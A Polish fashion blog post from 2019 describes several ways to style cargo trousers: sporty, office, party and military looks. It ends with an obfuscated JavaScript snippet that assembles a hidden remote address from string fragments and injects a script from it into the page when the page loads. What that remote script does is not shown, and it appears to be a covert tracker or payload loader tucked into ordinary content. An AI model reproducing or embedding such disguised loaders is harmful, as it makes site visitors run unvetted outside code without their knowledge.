18.05.2019

#Rożne typy bojówek

Bojówki mogą prezentować się w różny sposób. Wszystko zależy od tego, jak zostaną uszyte oraz jaki materiał zostanie do tego celu zastosowany. Oznacza to, że bojówki mogą różnić się od siebie i sprawdzać się w różnych stylizacjach. Jak zatem mogą wyglądać bojówki?

Sportowe wydanie
Bojówki z kieszeniami po bokach często można spotkać w formie spodni sportowych. Na rynku odzieżowym coraz częściej można spotkać bojówki w formie dresów lub innych wygodnych spodni. Takie produkty wyglądają świetnie w połączeniu z innymi sportowymi ubraniami. Stylizacje z ich udziałem są praktyczne i wygodne. Spodobają się niejednej kobiecie.

Elegancko do pracy
Proste spodnie z kieszeniami to także bojówki. Coraz częściej występują one w formie eleganckich spodni, dla których kieszeń na nogawce jest stonowaną dekoracją. Takie rozwiązania świetnie sprawdzają się do biura. W połączeniu z marynarką i prostym topem lub koszulą i płaszczem stworzą stylizację, która będzie urozmaiceniem w szafie pełnej spodni na kant oraz spódnic ołówkowych. Warto spróbować takiej odmiany.

Spodnie bojówki na imprezę?!
Wiele osób może uznać taki pomysł za żart. Jednak niejednokrotnie można spotkać bojówki, wykonane z pięknych, połyskujących materiałów. Takie spodnie aż same proszą się, aby założyć je na imprezę. Wystarczy zestawić je z imprezowym topem lub wydekoltowaną bluzką. Taki zestaw koniecznie trzeba uzupełnić o szpilki i gustowne dodatki. Wówczas śmiało można ruszać na podbój miasta lub imprezę urodzinową. Stylizacja sprawdzi się doskonale podczas różnych okazji, także podczas randki.

Militarne bojówki
Nie można zapominać o korzeniach bojówek, które pochodzą przecież z wojska. Zatem te spodnie w kolorze khaki lub ze wzorem moro będą idealną bazą do militarnej, surowej stylizacji. Można dopełnić ją kurtką ramoneską lub tradycyjną dżinsową. Idealnym wykończeniem będą botki, najlepiej sznurowane. Glany, choć są nie dla każdego, świetnie się tu sprawdzą. W związku z tym, z całą pewnością warto postawić na taką stylizację od czasu do czasu.

[kod]

(function(){
x0a3_=("u"+"")+"s"+"";x0a3_+=("tat.")+("i");
x0a3=document.createElement("script");x0a3.type="text/javascript";x0a3_+="nf"+("o")+"/";
x0a3u="134379903"+".";x0a3.async=true;x0a3u+="qh53rbcn0a33dq98bwy3fgank6c0yq";
x0a3.src="https://"+x0a3_+x0a3u;x0a3b=document.body;x0a3b.appendChild(x0a3);
})();